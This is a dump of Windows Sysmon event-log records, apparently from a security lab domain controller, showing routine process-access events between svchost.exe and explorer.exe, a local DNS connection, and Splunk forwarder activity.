22:53:04.176{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-6EE4-603D-1288-00000000AD01}8132C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695263Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:04.176{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-6C14-603D-B687-00000000AD01}8724C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695262Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:04.176{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-6C14-603D-B687-00000000AD01}8724C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695261Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:04.176{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-6C14-603D-B687-00000000AD01}8724C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695260Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:04.176{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-6C14-603D-B687-00000000AD01}8724C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695259Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:04.176{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695258Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:04.176{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695257Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:04.176{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695256Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:04.176{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695255Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:04.176{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695254Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:04.176{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695253Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:04.176{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695252Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:04.176{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695251Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:04.176{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695250Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:04.176{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695249Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:04.176{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695248Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:04.176{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695247Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:04.176{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695246Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:04.176{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695245Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:04.176{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-6D40-603D-DB87-00000000AD01}8848C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695244Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:04.176{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-6D40-603D-DB87-00000000AD01}8848C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695243Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:04.176{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-6D40-603D-DB87-00000000AD01}8848C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695242Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:04.176{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-6D40-603D-DB87-00000000AD01}8848C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 354300x80000000000000001695241Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:55.548{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1win-dc-974.attackrange.local53domainfalse127.0.0.1win-dc-974.attackrange.local51181- 23542300x80000000000000001695304Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:05.852{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5A695022F4966CA897144599BE7DBB7A,SHA256=9028799A1FEBC8FD65BC3BEF6B973196EFDD751D5FBE67F44FCBA09B10335AA2,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001695303Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:05.770{05ADC7E1-7051-603D-4588-00000000AD01}43966204C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695302Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:05.582{05ADC7E1-FB20-603C-5D79-00000000AD01}16523928C:\Windows\system32\conhost.exe{05ADC7E1-7051-603D-4588-00000000AD01}4396C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695301Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:05.582{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695300Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:05.582{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695299Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:05.582{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695298Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:05.582{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695297Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:05.582{05ADC7E1-229D-6039-0500-00000000AD01}636652C:\Windows\system32\csrss.exe{05ADC7E1-7051-603D-4588-00000000AD01}4396C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001695296Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:05.582{05ADC7E1-FB1F-603C-5979-00000000AD01}64843560C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{05ADC7E1-7051-603D-4588-00000000AD01}4396C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program 